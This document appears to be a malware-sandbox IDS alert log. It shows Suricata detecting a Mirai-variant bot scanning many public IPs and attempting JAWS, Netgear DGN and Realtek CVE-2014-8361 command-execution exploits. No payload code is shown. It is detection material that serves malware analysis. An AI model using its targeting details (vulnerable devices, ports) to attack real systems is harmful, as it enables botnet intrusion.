                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52624 -> 52.116.215.210:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:32980 -> 122.187.139.190:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40154 -> 99.216.95.166:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59424 -> 36.64.74.203:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45072 -> 209.161.87.32:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:46998 -> 203.226.247.235:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37414 -> 44.153.13.5:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60776 -> 15.182.172.18:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49042 -> 142.0.210.253:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60714 -> 207.79.150.234:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50212 -> 68.10.114.24:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50630 -> 205.138.223.89:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45114 -> 171.119.20.118:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59794 -> 45.90.89.27:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54464 -> 40.134.41.147:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46784 -> 97.137.41.211:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:60754 -> 45.112.243.18:8080
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:46784 -> 97.137.41.211:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45222 -> 11.190.108.117:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57024 -> 24.158.93.235:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44616 -> 222.239.189.68:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53618 -> 9.27.194.149:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39080 -> 196.155.214.59:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46996 -> 136.27.141.23:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44394 -> 152.145.133.63:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54816 -> 167.138.9.251:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54768 -> 76.160.156.242:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51128 -> 170.251.163.52:5555
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:54768 -> 76.160.156.242:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:48832 -> 106.222.158.5:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54284 -> 97.116.126.171:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39428 -> 163.197.220.203:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34158 -> 6.205.85.158:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46042 -> 193.206.30.210:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42656 -> 26.11.196.70:5555
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:53386 -> 58.189.121.169:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49462 -> 171.23.177.240:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49770 -> 178.81.166.199:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:45032 -> 9.130.45.96:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:44434 -> 155.189.226.125:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53152 -> 32.54.226.30:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55714 -> 122.248.149.165:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37136 -> 197.96.116.135:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:49896 -> 126.106.74.156:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:44542 -> 142.253.75.15:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40736 -> 31.23.54.208:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41512 -> 209.219.134.7:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48810 -> 59.230.90.160:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:54778 -> 171.79.99.1:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46302 -> 187.46.100.111:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46444 -> 55.164.19.178:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45848 -> 131.57.28.181:8080
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:46444 -> 55.164.19.178:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:34698 -> 124.127.132.57:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34592 -> 25.75.205.173:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37290 -> 35.200.178.13:5555
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:43418 -> 132.20.246.253:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41324 -> 142.172.142.87:49152
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:34526 -> 68.169.46.188:52869
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55714 -> 122.248.149.165:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56816 -> 107.227.55.144:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49388 -> 157.116.73.7:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54916 -> 167.15.35.246:7574
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56816 -> 107.227.55.144:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34262 -> 30.84.48.130:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49366 -> 177.120.79.8:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:56834 -> 152.0.87.200:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33862 -> 113.94.133.170:7574
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:49366 -> 177.120.79.8:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:50614 -> 215.230.56.175:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48570 -> 123.86.59.14:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58860 -> 95.213.81.21:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:58860 -> 95.213.81.21:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:49878 -> 136.58.228.44:8080
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:39538 -> 111.150.127.171:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:40352 -> 221.124.199.74:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:34374 -> 212.60.199.113:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:37876 -> 46.35.54.91:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:46898 -> 7.22.161.37:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57430 -> 109.90.191.175:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49334 -> 75.31.109.126:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56402 -> 45.49.121.237:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48112 -> 108.29.185.40:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36116 -> 3.195.8.90:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52560 -> 153.118.180.181:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43916 -> 105.45.143.155:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38934 -> 140.221.39.242:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60514 -> 158.166.4.165:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:55006 -> 163.122.132.187:8080
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:60498 -> 68.101.86.227:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54360 -> 220.234.56.30:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59610 -> 103.210.62.103:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38284 -> 203.108.157.203:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35764 -> 9.31.4.141:8080
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:47196 -> 100.49.226.162:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:34472 -> 89.109.61.141:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44056 -> 221.66.59.135:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:33618 -> 177.71.61.161:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46644 -> 7.29.11.132:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:58306 -> 102.6.12.154:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44238 -> 197.179.152.198:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53088 -> 68.228.150.77:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42460 -> 96.204.93.246:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36598 -> 152.206.32.137:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34178 -> 15.238.152.127:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59782 -> 2.144.168.159:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:51748 -> 40.57.210.168:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52194 -> 134.224.138.24:7574
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:38618 -> 126.210.97.150:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56786 -> 55.77.110.137:7574
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:47266 -> 3.111.24.133:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:33192 -> 25.76.24.63:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46204 -> 153.97.17.195:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49652 -> 50.196.185.72:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54474 -> 170.93.179.178:7574
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:49652 -> 50.196.185.72:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55294 -> 99.219.59.203:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50024 -> 179.251.32.251:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45012 -> 137.62.189.193:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48726 -> 191.33.92.105:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44322 -> 54.197.126.116:49152
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60514 -> 158.166.4.165:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57590 -> 118.79.188.67:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:44554 -> 215.109.47.160:8080
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:46276 -> 60.61.74.47:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36546 -> 217.237.6.188:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33160 -> 192.97.26.236:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:37394 -> 60.38.64.161:8080
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33160 -> 192.97.26.236:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:50024 -> 179.251.32.251:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:49382 -> 94.141.19.222:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41996 -> 161.154.233.90:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:41996 -> 161.154.233.90:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55508 -> 184.76.229.89:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51976 -> 28.36.92.242:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38626 -> 137.6.145.87:5555
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:36296 -> 24.168.141.210:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49262 -> 55.92.215.83:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40020 -> 173.220.217.199:5555
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:57590 -> 118.79.188.67:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:35628 -> 178.233.21.105:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52506 -> 170.254.161.26:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:36122 -> 14.204.207.237:8080
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:60268 -> 128.39.179.200:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50966 -> 202.214.164.77:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54792 -> 114.177.103.150:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42750 -> 114.220.234.17:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51822 -> 120.121.182.155:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40158 -> 74.42.253.221:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53006 -> 180.158.189.190:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:57050 -> 146.110.86.85:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48870 -> 129.46.212.84:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48870 -> 129.46.212.84:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58492 -> 81.241.101.2:8080
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:43986 -> 85.206.232.118:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:44366 -> 19.106.226.188:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49030 -> 9.179.110.111:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:59874 -> 108.136.248.79:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46988 -> 157.96.102.17:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:46988 -> 157.96.102.17:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50950 -> 58.130.138.131:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:37650 -> 119.37.208.253:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:38900 -> 167.201.110.208:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:49926 -> 78.37.28.105:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49106 -> 190.16.155.107:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53954 -> 202.178.119.161:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:53954 -> 202.178.119.161:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45316 -> 187.38.102.206:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39418 -> 200.13.149.223:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:39418 -> 200.13.149.223:80
